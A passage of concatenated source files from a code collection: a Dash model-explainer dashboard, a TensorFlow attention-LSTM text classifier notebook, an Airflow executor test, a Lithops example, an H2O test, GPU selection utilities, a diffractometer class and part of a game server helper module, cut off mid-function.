for tab in self.tabs]
self.app.layout = dbc.Container([
self.title_and_label_selector.layout(),
dcc.Tabs(id="tabs", value=self.tabs[0].tab_id, children=self.tab_layouts),
], fluid=True)
#register callbacks
self.title_and_label_selector.register_callbacks(self.app)
for tab in self.tabs:
tab.register_callbacks(self.app)
def _insert_tabs(self):
if self.model_summary:
self.tabs.append(ModelSummaryTab(self.explainer, **self.kwargs))
if self.contributions:
self.tabs.append(ContributionsTab(self.explainer, **self.kwargs))
if self.shap_dependence:
self.tabs.append(ShapDependenceTab(self.explainer, **self.kwargs))
if self.shap_interaction:
self.tabs.append(ShapInteractionsTab(self.explainer, **self.kwargs))
if self.decision_trees:
assert hasattr(self.explainer, 'decision_trees'), \
"""the explainer object has no shadow_trees property. This tab
only works with a RandomForestClassifierBunch or RandomForestRegressionBunch"""
self.tabs.append(DecisionTreesTab(self.explainer, **self.kwargs))
def run(self, port=8050, **kwargs):
"""Starts the dashboard using the built-in Flask server on localhost:port
:param port: the port to run the dashboard on, defaults to 8050
:type port: int, optional
"""
print(f"Running {self.title} on http://localhost:{port}")
pio.templates.default = self.plotly_template
self.app.run_server(port=port, **kwargs)
class ExplainerDashboardStandaloneTab:
"""Constructs a dashboard out of an ExplainerBunch object. You can indicate
which tabs to include, and pass kwargs to individual tabs.
"""
def __init__(self, explainer, tab, title='Model Explainer',
plotly_template="none", **kwargs):
"""Constructs an ExplainerDashboard.
:param explainer: an ExplainerBunch object
:param title: Title of the dashboard, defaults to 'Model Explainer'
:type title: str, optional
:param tab: single tab to be run as dashboard
"""
self.explainer = explainer
self.title = title
self.plotly_template = plotly_template
self.kwargs = kwargs
self.tab = tab(self.explainer, standalone=True, **self.kwargs)
self.app = dash.Dash(__name__)
        self.app.config['suppress_callback_exceptions'] = True
self.app.css.config.serve_locally = True
self.app.scripts.config.serve_locally = True
self.app.title = title
pio.templates.default = self.plotly_template
self.app.layout = self.tab.layout()
self.tab.register_callbacks(self.app)
def run(self, port=8050, **kwargs):
"""Starts the dashboard using the built-in Flask server on localhost:port
:param port: the port to run the dashboard on, defaults to 8050
:type port: int, optional
"""
print(f"Running {self.title} on http://localhost:{port}")
pio.templates.default = self.plotly_template
self.app.run_server(port=port, **kwargs)
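# Minimal usage sketch (assumes `explainer` is an already-fitted ExplainerBunch):
#   ExplainerDashboard(explainer, title="My Model", shap_interaction=False).run(port=8050)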
|
the-stack_0_19893 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import time
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
import sklearn.datasets
from sklearn.model_selection import train_test_split
from utils import *
# In[2]:
trainset = sklearn.datasets.load_files(container_path="data", encoding="UTF-8")
trainset.data, trainset.target = separate_dataset(trainset, 1.0)
print(trainset.target_names)
print(len(trainset.data))
print(len(trainset.target))
# In[3]:
train_X, test_X, train_Y, test_Y = train_test_split(trainset.data, trainset.target, test_size=0.2)
# In[4]:
concat = " ".join(trainset.data).split()
vocabulary_size = len(list(set(concat)))
data, count, dictionary, rev_dictionary = build_dataset(concat, vocabulary_size)
print("vocab from size: %d" % (vocabulary_size))
print("Most common words", count[4:10])
print("Sample data", data[:10], [rev_dictionary[i] for i in data[:10]])
# In[5]:
GO = dictionary["GO"]
PAD = dictionary["PAD"]
EOS = dictionary["EOS"]
UNK = dictionary["UNK"]
# In[6]:
size_layer = 128
num_layers = 2
embedded_size = 128
dimension_output = len(trainset.target_names)
learning_rate = 1e-3
maxlen = 50
batch_size = 128
# In[7]:
class Model:
def __init__(
self, size_layer, num_layers, embedded_size, dict_size, dimension_output, learning_rate
):
def cells(reuse=False):
return tf.nn.rnn_cell.LSTMCell(
size_layer, initializer=tf.orthogonal_initializer(), reuse=reuse
)
self.X = tf.placeholder(tf.int32, [None, None])
self.Y = tf.placeholder(tf.int32, [None])
batch_size = tf.shape(self.X)[0]
encoder_embeddings = tf.Variable(tf.random_uniform([dict_size, embedded_size], -1, 1))
encoder_embedded = tf.nn.embedding_lookup(encoder_embeddings, self.X)
outputs, last_state = tf.nn.dynamic_rnn(
tf.nn.rnn_cell.MultiRNNCell([cells() for _ in range(num_layers)]),
encoder_embedded,
dtype=tf.float32,
)
attention_mechanism = tf.contrib.seq2seq.LuongAttention(
num_units=size_layer, memory=outputs
)
rnn_cells = tf.contrib.seq2seq.AttentionWrapper(
cell=tf.nn.rnn_cell.MultiRNNCell([cells() for _ in range(num_layers)]),
attention_mechanism=attention_mechanism,
attention_layer_size=size_layer,
alignment_history=True,
)
decoder_outputs, decoder_last_state = tf.nn.dynamic_rnn(
rnn_cells,
encoder_embedded,
initial_state=rnn_cells.zero_state(batch_size, tf.float32).clone(cell_state=last_state),
dtype=tf.float32,
)
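        # alignment_history.stack() yields [decoder_step, batch, encoder_step];
        # transpose to [batch, encoder_step, decoder_step] for the attention
        # heatmap plotted below.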
self.alignments = tf.transpose(decoder_last_state.alignment_history.stack(), [1, 2, 0])
W = tf.get_variable(
"w", shape=(size_layer, dimension_output), initializer=tf.orthogonal_initializer()
)
b = tf.get_variable("b", shape=(dimension_output), initializer=tf.zeros_initializer())
self.logits = tf.matmul(outputs[:, -1], W) + b
self.cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=self.Y)
)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)
correct_pred = tf.equal(tf.argmax(self.logits, 1, output_type=tf.int32), self.Y)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# In[8]:
tf.reset_default_graph()
sess = tf.InteractiveSession()
model = Model(
size_layer, num_layers, embedded_size, len(dictionary), dimension_output, learning_rate
)
sess.run(tf.global_variables_initializer())
# In[9]:
EARLY_STOPPING, CURRENT_CHECKPOINT, CURRENT_ACC, EPOCH = 5, 0, 0, 0
while True:
lasttime = time.time()
if CURRENT_CHECKPOINT == EARLY_STOPPING:
print("break epoch:%d\n" % (EPOCH))
break
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, (len(train_X) // batch_size) * batch_size, batch_size):
batch_x = str_idx(train_X[i : i + batch_size], dictionary, maxlen)
acc, loss, _ = sess.run(
[model.accuracy, model.cost, model.optimizer],
feed_dict={model.X: batch_x, model.Y: train_Y[i : i + batch_size]},
)
train_loss += loss
train_acc += acc
for i in range(0, (len(test_X) // batch_size) * batch_size, batch_size):
batch_x = str_idx(test_X[i : i + batch_size], dictionary, maxlen)
acc, loss = sess.run(
[model.accuracy, model.cost],
feed_dict={model.X: batch_x, model.Y: test_Y[i : i + batch_size]},
)
test_loss += loss
test_acc += acc
train_loss /= len(train_X) // batch_size
train_acc /= len(train_X) // batch_size
test_loss /= len(test_X) // batch_size
test_acc /= len(test_X) // batch_size
if test_acc > CURRENT_ACC:
print("epoch: %d, pass acc: %f, current acc: %f" % (EPOCH, CURRENT_ACC, test_acc))
CURRENT_ACC = test_acc
CURRENT_CHECKPOINT = 0
else:
CURRENT_CHECKPOINT += 1
print("time taken:", time.time() - lasttime)
print(
"epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n"
% (EPOCH, train_loss, train_acc, test_loss, test_acc)
)
EPOCH += 1
# In[10]:
sns.set()
# In[11]:
heatmap = sess.run(
model.alignments, feed_dict={model.X: str_idx(test_X[1:2], dictionary, len(test_X[1].split()))}
)
# In[12]:
plt.figure(figsize=(15, 10))
sns.heatmap(heatmap[:, 0, :], xticklabels=test_X[1].split(), yticklabels=test_X[1].split())
plt.show()
|
the-stack_0_19894 | """
Rename TOPS-20 filespecs to regular filenames without the version number
"""
from os import listdir, rename
import os.path
import re
SOURCEPATH = "10_7_mon/ctls"
tops20File = re.compile("(.*\.\w\w\w)(\.\d)")
files = listdir(SOURCEPATH)
pairs = []
for f in files:
m = tops20File.match(f)
if m:
        p = (f, m.groups()[0])
pairs.append(p)
for p in pairs:
original = os.path.join(SOURCEPATH, p[0])
nou = os.path.join(SOURCEPATH, p[1])
os.rename(original, nou)
|
the-stack_0_19896 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import mock
from parameterized import parameterized
from airflow import plugins_manager
from airflow.executors.executor_loader import ExecutorLoader
from tests.test_utils.config import conf_vars
# Plugin Manager creates new modules, which is difficult to mock, so we use test isolation by a unique name.
TEST_PLUGIN_NAME = "unique_plugin_name_to_avoid_collision_i_love_kitties"
class FakeExecutor:
pass
class FakePlugin(plugins_manager.AirflowPlugin):
name = TEST_PLUGIN_NAME
executors = [FakeExecutor]
class TestExecutorLoader(unittest.TestCase):
def setUp(self) -> None:
ExecutorLoader._default_executor = None
def tearDown(self) -> None:
ExecutorLoader._default_executor = None
@parameterized.expand([
("LocalExecutor", ),
("DebugExecutor", ),
])
def test_should_support_executor_from_core(self, executor_name):
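        # conf_vars temporarily overrides airflow.cfg values for the duration
        # of the context manager, then restores the originals.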
with conf_vars({
("core", "executor"): executor_name
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual(executor_name, executor.__class__.__name__)
@mock.patch("airflow.plugins_manager.plugins", [
FakePlugin()
])
@mock.patch("airflow.plugins_manager.executors_modules", None)
def test_should_support_plugins(self):
with conf_vars({
("core", "executor"): f"{TEST_PLUGIN_NAME}.FakeExecutor"
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual("FakeExecutor", executor.__class__.__name__)
def test_should_support_custom_path(self):
with conf_vars({
("core", "executor"): "tests.executors.test_executor_loader.FakeExecutor"
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual("FakeExecutor", executor.__class__.__name__)
|
the-stack_0_19897 | """
Simple Lithops example using the 'storage' parameter, which is
a ready-to-use Storage instance.
"""
import lithops
def my_function(bucket_name, obj_key, storage):
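    # Lithops injects this ready-to-use Storage client automatically because
    # the parameter is named 'storage' (a reserved parameter name).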
print('I am processing the object //{}/{}'.format(bucket_name, obj_key))
counter = {}
data = storage.get_object(bucket_name, obj_key)
for line in data.splitlines():
for word in line.decode('utf-8').split():
if word not in counter:
counter[word] = 1
else:
counter[word] += 1
return counter
if __name__ == '__main__':
bucket_name = 'lithops-sample-data'
obj_key = 'obj1.txt'
fexec = lithops.FunctionExecutor()
fexec.call_async(my_function, [bucket_name, obj_key])
print(fexec.get_result())
|
the-stack_0_19898 | from __future__ import print_function
import sys
import h2o
sys.path.insert(1,"../../../")
from tests import pyunit_utils
from h2o.estimators.aggregator import H2OAggregatorEstimator
#testing default setup of following parameters:
#distribution (available in Deep Learning, XGBoost, GBM):
#stopping_metric (available in: GBM, DRF, Deep Learning, AutoML, XGBoost, Isolation Forest):
#histogram_type (available in: GBM, DRF)
#solver (available in: GLM) already done in hex.glm.GLM.defaultSolver()
#categorical_encoding (available in: GBM, DRF, Deep Learning, K-Means, Aggregator, XGBoost, Isolation Forest)
#fold_assignment (available in: GBM, DRF, Deep Learning, GLM, Naïve-Bayes, K-Means, XGBoost)
def test_aggregator_effective_parameters():
frame = h2o.create_frame(rows=10000, cols=10, categorical_fraction=0.6, integer_fraction=0, binary_fraction=0, real_range=100,
integer_range=100, missing_fraction=0, factors=100, seed=1234)
agg1 = H2OAggregatorEstimator(target_num_exemplars=1000, rel_tol_num_exemplars=0.5, categorical_encoding="eigen")
agg1.train(training_frame=frame)
agg2 = H2OAggregatorEstimator(target_num_exemplars=1000, rel_tol_num_exemplars=0.5)
agg2.train(training_frame=frame)
assert agg2.parms['categorical_encoding']['input_value'] == "AUTO"
assert agg2.parms['categorical_encoding']['actual_value'] == agg1.parms['categorical_encoding']['actual_value']
if __name__ == "__main__":
pyunit_utils.standalone_test(test_aggregator_effective_parameters)
else:
test_aggregator_effective_parameters()
|
the-stack_0_19900 | import torch
import subprocess
import numpy as np
import pdb
from graphgym.config import cfg
import logging
import os
def get_gpu_memory_map():
'''Get the current gpu usage.'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
gpu_memory = np.array([int(x) for x in result.strip().split('\n')])
return gpu_memory
def get_current_gpu_usage():
result = subprocess.check_output(
[
'nvidia-smi', '--query-compute-apps=pid,used_memory',
'--format=csv,nounits,noheader'
], encoding='utf-8')
current_pid = os.getpid()
used_memory = 0
for line in result.strip().split('\n'):
line = line.split(', ')
if current_pid == int(line[0]):
used_memory += int(line[1])
return used_memory
def auto_select_device(memory_max=8000, memory_bias=200, strategy='random'):
'''Auto select GPU device'''
if cfg.device != 'cpu' and torch.cuda.is_available():
if cfg.device == 'auto':
memory_raw = get_gpu_memory_map()
if strategy == 'greedy' or np.all(memory_raw > memory_max):
cuda = np.argmin(memory_raw)
logging.info('GPU Mem: {}'.format(memory_raw))
logging.info(
'Greedy select GPU, select GPU {} with mem: {}'.format(
cuda, memory_raw[cuda]))
elif strategy == 'random':
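                # Weight each GPU by the inverse of its used memory (plus a
                # small bias) so emptier cards are proportionally more likely
                # to be selected; cards above memory_max are excluded.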
memory = 1 / (memory_raw + memory_bias)
memory[memory_raw > memory_max] = 0
gpu_prob = memory / memory.sum()
np.random.seed()
cuda = np.random.choice(len(gpu_prob), p=gpu_prob)
np.random.seed(cfg.seed)
logging.info('GPU Mem: {}'.format(memory_raw))
logging.info('GPU Prob: {}'.format(gpu_prob.round(2)))
logging.info(
'Random select GPU, select GPU {} with mem: {}'.format(
cuda, memory_raw[cuda]))
cfg.device = 'cuda:{}'.format(cuda)
else:
cfg.device = 'cpu'
|
the-stack_0_19902 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (division, absolute_import, print_function,
unicode_literals)
def allConstruct(target: str, wordBank: list, memo: dict = None) -> list:
if memo is None:
memo = {}
if target in memo:
return memo[target]
if target == "":
return [[]]
result = []
for word in wordBank:
try:
if target.index(word) == 0:
suffix = target[len(word):]
suffixWays = allConstruct(suffix, wordBank, memo)
targetWays = list(
map(lambda way, wrd=word: [wrd, *way], suffixWays))
result.extend(targetWays)
except ValueError:
pass
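    # Cache every decomposition of this target so repeated suffixes across
    # branches are only expanded once (classic memoized recursion).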
memo[target] = result
return result
def main():
# [['purp', 'le'], ['p', 'ur', 'p', 'le']]
print(allConstruct("purple", ["purp", "p", "ur", "le", "purpl"]))
# [['ab', 'cd', 'ef'], ['ab', 'c', 'def'], ['abc', 'def'], ['abcd', 'ef']]
print(allConstruct("abcdef", ["ab", "abc",
"cd", "def", "abcd", "ef", "c"]))
print(allConstruct("skateboard", [
"bo", "rd", "ate", "t", "ska", "sk", "boar"])) # []
# [['enter', 'a', 'p', 'ot', 'ent', 'p', 'ot'],
# ['enter', 'a', 'p', 'ot', 'ent', 'p', 'o', 't'],
# ['enter', 'a', 'p', 'o', 't', 'ent', 'p', 'ot'],
# ['enter', 'a', 'p', 'o', 't', 'ent', 'p', 'o', 't']]
print(allConstruct("enterapotentpot", [
"a", "p", "ent", "enter", "ot", "o", "t"]))
print(allConstruct("eeeeeeeeeeeeeeeeeeeeeeeeeeez",
["a", "aa", "aaa", "aaaa", "aaaaa"])) # []
if __name__ == '__main__':
main()
|
the-stack_0_19903 | import os
import time
from os import makedirs
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import RectBivariateSpline
from scipy.ndimage import affine_transform
from scipy.ndimage import fourier_gaussian
class Diffractometer:
def __init__(
self,
grid_size=512,
zoom=4,
peak_width=1,
length_scale=3.905,
bot=4e-6,
top=0.7
):
"""
Initialize the diffractometer class
Parameters
----------
grid_size : int,
size of the diffraction grid (default 512)
        zoom : int, (default 4)
        peak_width : float, width of the diffraction peaks (default 1)
        length_scale : float, (default 3.905)
        bot : float, lower bound used to clip intensities (default 4e-6)
        top : float, upper bound used to clip intensities (default 0.7)
"""
self.N = grid_size
self.zoom = zoom
self.peak_width = peak_width
self.bin_w = 2.0
self.length_scale = length_scale
self.bot = bot
self.top = top
def load(self, xyz, L):
"""Load the particle positions and box dimensions for diffraction.
Note: only supports orthorhombic boxes
Parameters
----------
xyz : np.ndarray (N,3),
positions of each particle
L : iterable object,
lengths of box vectors
"""
self.box = np.array(
[[L[0], 0.0, 0.0],
[0.0, L[1], 0.0],
[0.0, 0.0, L[2]]]
)
self.orig = np.copy(xyz)
self.orig, self.image = shift_pbc(xyz, np.array([L[0], L[1], L[2]]))
def pbc_2d(self, xy, N):
"""
Reasonably fast periodic boundary conditions in two dimensions.
Normalizes xy coordinates to the grid size, N.
Parameters
----------
xy : numpy.ndarray (N,2),
cartesian coordinates from [-0.5, 0.5) to be mapped to [0, N)
N : int,
grid size
Returns
-------
numpy.ndarray (N,2),
particle bins indices in the x and y directions.
"""
xy -= np.rint(xy) - 0.5
xy *= N
xy %= N
return xy.astype(int)
def bin(self, xy, N):
"""
Quickly counts intensities for particles on 2D grid.
Parameters
----------
xy : numpy.ndarray (N,2),
array of bin indices
N : int,
grid size
Returns
-------
im : numpy.ndarray (N,N),
grid of intensities.
"""
t = xy.view(np.dtype((np.void, xy.dtype.itemsize * xy.shape[1])))
_, ids, counts = np.unique(t, return_index=True, return_counts=True)
unique_xy = xy[ids]
N = int(N)
im = np.zeros((N, N))
for x, c in zip(unique_xy, counts):
im[x[1], x[0]] = c
return im
def calc_proj(self, rot):
"""
        Compute the inverse shear matrix used to project the rotated box onto a 2D plane.
Note: orthorhombic boxes only
Parameters
----------
rot : numpy.ndarray (3,3),
rotation matrix
Returns
-------
numpy.ndarray (2,2),
inverse shear matrix
"""
s = np.dot(rot.T, self.box) # rotated box vectors
xy = np.absolute(s[0, 0] * s[1, 1] - s[0, 1] * s[1, 0])
zx = np.absolute(s[0, 2] * s[1, 0] - s[0, 0] * s[1, 2])
yz = np.absolute(s[0, 1] * s[1, 2] - s[0, 2] * s[1, 1])
if (yz >= xy) and (yz >= zx):
shear = np.array(
[[s[0, 1], s[0, 2]],
[s[1, 1], s[1, 2]]]
)
elif (zx >= xy) and (zx >= yz):
shear = np.array(
[[s[0, 2], s[0, 0]],
[s[1, 2], s[1, 0]]]
)
else:
shear = np.array(
[[s[0, 0], s[0, 1]],
[s[1, 0], s[1, 1]]]
)
s_det = np.linalg.det(shear)
if s_det == 0:
print("\nSingular rotation matrix. Bye Bye.")
return
self.Lx = np.linalg.norm(shear[:, 0])
self.Ly = np.linalg.norm(shear[:, 1])
inv_shear = np.linalg.inv(shear)
return inv_shear
def circle_cutout(self, p):
"""
Find pixels indices in diffraction intensity array outside of the circle
Note: taken from Diffractometer.prep_sq()
Parameters
----------
p : numpy.ndarray (N,N),
diffraction intensity array
Returns
-------
numpy.ndarray (N,),
indices of particles outside the circle
note: N != to N in p.shape
"""
y, x = np.indices(p.shape)
rmax = len(x) / 2 - 1
center = np.array([rmax, rmax])
# radii, constant for a single zoom
r = np.hypot(x - center[1], y - center[0]).flatten()
# array index into p corresponding to r
i = np.argsort(r.flat)
# sorted radius indices
r_sort = r.flat[i]
return i[r_sort > rmax]
def scale(self, a):
"""
Scales up a matrix around middle particle
Note: Doesn't handle atoms on periodic boundaries perfectly -- intensity
only on one half of boundary.
Parameters
----------
a : numpy.ndarray (N,N),
input array
Returns
-------
numpy.ndarray (N,N),
scaled array
"""
ny, nx = np.shape(a)
y = np.array([list(range(ny))])
x = np.array([list(range(nx))])
d = RectBivariateSpline(x, y, a, kx=1, ky=1)
x = np.linspace(0, nx, self.N)
y = np.linspace(0, ny, self.N)
d = d(x, y)
return d
def shear_back(self, img, inv_shear):
"""
        Shear the diffraction image back into the original (unsheared) frame.
Parameters
----------
img : numpy.ndarray (N,N),
array of diffraction intensities
inv_shear : numpy.ndarray (2,2),
inverse shear matrix
Returns
-------
numpy.ndarray (N,N),
sheared array of diffraction intensities
"""
roll = img.shape[0] / 2 - 1
ss = np.max(self.box) * inv_shear
A1 = np.array(
[[1, 0, -roll],
[0, 1, -roll],
[0, 0, 1]]
)
A2 = np.array(
[[ss[1, 0], ss[0, 0], roll],
[ss[1, 1], ss[0, 1], roll],
[0, 0, 1]]
)
A3 = np.linalg.inv(np.dot(A2, A1))
A4 = A3[0:2, 0:2]
A5 = A3[0:2, 2]
img = affine_transform(img, A4, A5, mode="constant")
return img
def diffract_from_camera(self, camera):
"""
2D FFT to get diffraction pattern from intensity matrix.
Parameters
----------
camera : fresnel.camera,
camera which will be used to get the rotation matrix for
diffraction
Returns
-------
numpy.ndarray (N,N),
diffraction pattern
"""
rot = camera_to_rot(camera)
return self.diffract(rot.T)
def diffract(self, rot, cutout=True):
"""
2D FFT to get diffraction pattern from intensity matrix.
Parameters
----------
rot : numpy.ndarray (3, 3),
rotation matrix
cutout : bool,
return diffraction pattern with circle cutout (default True)
Returns
-------
numpy.ndarray (N,N),
diffraction pattern
"""
N = self.N / self.zoom
inv_shear = self.calc_proj(rot)
xy = np.copy(np.dot(self.orig, rot)[:, 0:2])
xy = np.dot(xy, inv_shear.T)
xy = self.pbc_2d(xy, N)
im = self.bin(xy, N)
dp = np.fft.fft2(im)
dp = fourier_gaussian(dp, self.peak_width / self.zoom)
dp = np.fft.fftshift(dp)
dp = np.absolute(dp)
dp *= dp
dp = self.scale(dp)
dp = self.shear_back(dp, inv_shear)
dp /= dp.max()
dp[dp < self.bot] = self.bot
dp[dp > self.top] = self.top
dp = np.log10(dp)
if not cutout:
return dp
idbig = self.circle_cutout(dp)
dp[np.unravel_index(idbig, (self.N, self.N))] = np.log10(self.bot)
return dp
def vector_projection(u, v):
"""
Projection of u onto v
Parameters
----------
u,v : numpy.ndarray (3,),
vectors
Returns
-------
numpy.ndarray (3,),
projection of u onto v
"""
return v * np.dot(u, v)/np.linalg.norm(v)
def unit_vector(vector):
"""
Returns the unit vector of the vector.
"""
return vector / np.linalg.norm(vector)
def get_angle(u, v):
"""
Find angle between u and v
Parameters
----------
u,v : numpy.ndarray (3,),
vectors
Returns
-------
float,
angle between u and v in radians
"""
u = unit_vector(u)
v = unit_vector(v)
angle = np.arccos(np.clip(np.dot(u,v), -1.0, 1.0))
if angle != angle:
# Catches nan values
return 0.0
return angle
def camera_to_rot(camera):
"""
Given a fresnel camera object, compute the rotation matrix
Parameters
----------
camera : fresnel.camera,
camera in fresnel scene
Returns
-------
numpy.ndarray (3,3),
rotation matrix
"""
pos = camera.position
look_at = camera.look_at
cam_vec = np.array(pos)-np.array(look_at)
## axis vectors
#xvec = np.array([1,0,0])
#yvec = np.array([0,1,0])
#zvec = np.array([0,0,1])
## Project the camera vector into the xy, yz, and xz planes
## by subtracting the projection of the plane normal vector
#cam_xy = cam_vec - vector_projection(cam_vec, zvec)
#cam_yz = cam_vec - vector_projection(cam_vec, xvec)
#cam_xz = cam_vec - vector_projection(cam_vec, yvec)
## find the angles betwen the camera vector projections and the axes vectors
## alpha is in the yz, beta xz, gamma xy
#alpha = get_angle(cam_yz, yvec)
#beta = get_angle(cam_xz, zvec)
#gamma = get_angle(cam_xy, xvec)
return rotation_matrix_from_to(cam_vec, np.array([0,0,1]))
def rot_mat(alpha, beta, gamma):
"""
Given angles alpha, beta, and gamma, compute the rotation matrix
Parameters
----------
alpha, beta, gamma : float,
angles about the x, y, and z axes in radians
Returns
-------
numpy.ndarray (3,3),
rotation matrix
"""
Rx = np.array([
[1, 0, 0],
[0, np.cos(alpha), -np.sin(alpha)],
[0, np.sin(alpha), np.cos(alpha)]
])
Ry = np.array([
[np.cos(beta), 0, np.sin(beta)],
[0, 1, 0],
[-np.sin(beta), 0, np.cos(beta)]
])
Rz = np.array([
[np.cos(gamma), -np.sin(gamma), 0],
[np.sin(gamma), np.cos(gamma), 0],
[0, 0, 1]
])
return np.dot(np.dot(Rx,Ry),Rz)
def shift_pbc(positions, box):
"""
Wraps particle positions into a periodic box.
Parameters
----------
positions : numpy.ndarray
particle positions
box : numpy.ndarray
box lengths, assumes box goes from -L/2 to L/2.
Returns
-------
p, numpy.ndarray
wrapped coordinate array
image, numpy.ndarray
image array
"""
p = np.copy(positions)
p += box/2.
image = np.copy(p)
image[:] /= box
image = np.array(image, dtype=int)
p[:] -= image[:]*box
p[p[:, 0] < 0., 0] += box[0]
p[p[:, 1] < 0., 1] += box[1]
p[p[:, 2] < 0., 2] += box[2]
p -= box/2.
return p, image
def rotation_matrix_from_to(a, b):
"""
Returns rotation matrix R such that norm(b)*dot(R,a)/norm(a) = b.
Parameters
----------
a : numpy.ndarray,
A 3-vector
b : numpy.ndarray,
Another 3-vector
Returns
-------
numpy.ndarray
The 3x3 rotation matrix that will would rotate a parallel to b.
"""
a1 = a/np.linalg.norm(a)
b1 = b/np.linalg.norm(b)
theta = np.arccos(np.dot(a1,b1))
if theta<1e-6 or np.isnan(theta):
return np.identity(3)
if np.pi-theta<1e-6: #TODO(Eric): verify correct
d = np.array([1.,0,0])
x = np.cross(a1,d)
else:
x = np.cross(a1,b1)
x /= np.linalg.norm(x)
A = np.array([ [0,-x[2],x[1]], [x[2],0,-x[0]], [-x[1],x[0],0] ])
R = np.identity(3) + np.sin(theta)*A + (1.-np.cos(theta))*np.dot(A,A)
return R
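# Minimal usage sketch (hypothetical inputs; assumes an orthorhombic box with
# side lengths L and particle positions xyz of shape (N, 3)):
#   d = Diffractometer(grid_size=512, zoom=4)
#   d.load(xyz, L=[10.0, 10.0, 10.0])
#   pattern = d.diffract(np.identity(3))  # view down the z axis
#   plt.imshow(pattern)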
|
the-stack_0_19904 | # coding: utf-8
import dataclasses
import os
from PIL import Image, ImageEnhance
import enum
from os import path
from pathlib import Path
import typing
import shutil
from guilang.description import Description
from guilang.description import Part
from rolling.exception import WrongInputError
from rolling.log import server_logger
from rolling.map.type.zone import ZoneMapTileType
from rolling.model.measure import Unit
from rolling.server.link import CharacterActionLink
if typing.TYPE_CHECKING:
from rolling.kernel import Kernel
from rolling.map.source import ZoneMapSource
from rolling.model.character import CharacterModel
from rolling.model.resource import CarriedResourceDescriptionModel
from rolling.model.stuff import StuffModel
ORIGINAL_AVATAR_PATTERN = "character_avatar__original__{avatar_uuid}.png"
ILLUSTRATION_AVATAR_PATTERN = "character_avatar__illustration__{avatar_uuid}.png"
ZONE_THUMB_AVATAR_PATTERN = "character_avatar__zone_thumb__{avatar_uuid}.png"
@dataclasses.dataclass
class EmptyModel:
pass
def get_on_and_around_coordinates(
x: int, y: int, distance: int = 1, exclude_on: bool = False
) -> typing.List[typing.Tuple[int, int]]:
positions = []
if not exclude_on:
positions.append((x, y))
positions.extend(
[
(x - distance, y - distance),
(x, y - distance),
(x + distance, y - distance),
(x - distance, y),
(x + distance, y),
(x - distance, y + distance),
(x, y + distance),
(x + distance, y + distance),
]
)
return positions
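# For example, get_on_and_around_coordinates(5, 5) returns the tile itself
# followed by its eight neighbours:
#   [(5, 5), (4, 4), (5, 4), (6, 4), (4, 5), (6, 5), (4, 6), (5, 6), (6, 6)]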
def is_there_resource_id_in_zone(
kernel: "Kernel", resource_id: str, zone_source: "ZoneMapSource"
) -> bool:
for row in zone_source.geography.rows:
for zone_tile_type in row:
zone_tile_type = typing.cast(typing.Type[ZoneMapTileType], zone_tile_type)
try:
productions = kernel.game.world_manager.world.tiles_properties[
zone_tile_type
].produce
except KeyError:
productions = []
if resource_id in [production.resource.id for production in productions]:
return True
return False
def get_stuffs_filled_with_resource_id(
kernel: "Kernel",
character_id: str,
resource_id: str,
exclude_stuff_ids: typing.Optional[typing.List[int]] = None,
) -> typing.Iterator["StuffModel"]:
from rolling.server.lib.stuff import StuffLib
exclude_stuff_ids = exclude_stuff_ids or []
stuff_lib = StuffLib(kernel=kernel)
character_stuffs = stuff_lib.get_carried_by(character_id)
for stuff in character_stuffs:
if (
stuff.filled_with_resource == resource_id
and stuff.id not in exclude_stuff_ids
):
yield stuff
class CornerEnum(enum.Enum):
TOP = "TOP"
TOP_RIGHT = "TOP_RIGHT"
RIGHT = "RIGHT"
BOTTOM_RIGHT = "BOTTOM_RIGHT"
BOTTOM = "BOTTOM"
BOTTOM_LEFT = "BOTTOM_LEFT"
LEFT = "LEFT"
TOP_LEFT = "TOP_LEFT"
def get_opposite_zone_place(
from_: CornerEnum, zone_width: int, zone_height: int
) -> typing.Tuple[int, int]:
width_part_len = zone_width // 3
half_width_part_len = width_part_len // 2
height_part_len = zone_height // 3
half_height_part_len = height_part_len // 2
if from_ == CornerEnum.TOP:
return 0, zone_width // 2
if from_ == CornerEnum.TOP_RIGHT:
return (height_part_len * 2) + half_height_part_len, half_width_part_len + 1
if from_ == CornerEnum.RIGHT:
return zone_height // 2, zone_width - 1
if from_ == CornerEnum.BOTTOM_RIGHT:
return (
(height_part_len * 2) + half_height_part_len,
(width_part_len * 2) + half_width_part_len - 1,
)
if from_ == CornerEnum.BOTTOM:
return zone_height - 1, zone_width // 2
if from_ == CornerEnum.BOTTOM_LEFT:
return half_height_part_len, ((width_part_len * 2) + half_width_part_len - 1)
if from_ == CornerEnum.LEFT:
return zone_height // 2, 0
if from_ == CornerEnum.TOP_LEFT:
return half_height_part_len, half_width_part_len + 1
raise Exception("It is not possible !")
def get_coming_from(
before_row_i: int, before_col_i: int, after_row_i: int, after_col_i: int
) -> CornerEnum:
if after_row_i == before_row_i - 1 and after_col_i == before_col_i:
return CornerEnum.BOTTOM
if after_row_i == before_row_i - 1 and after_col_i == before_col_i + 1:
return CornerEnum.TOP_RIGHT
if after_row_i == before_row_i and after_col_i == before_col_i + 1:
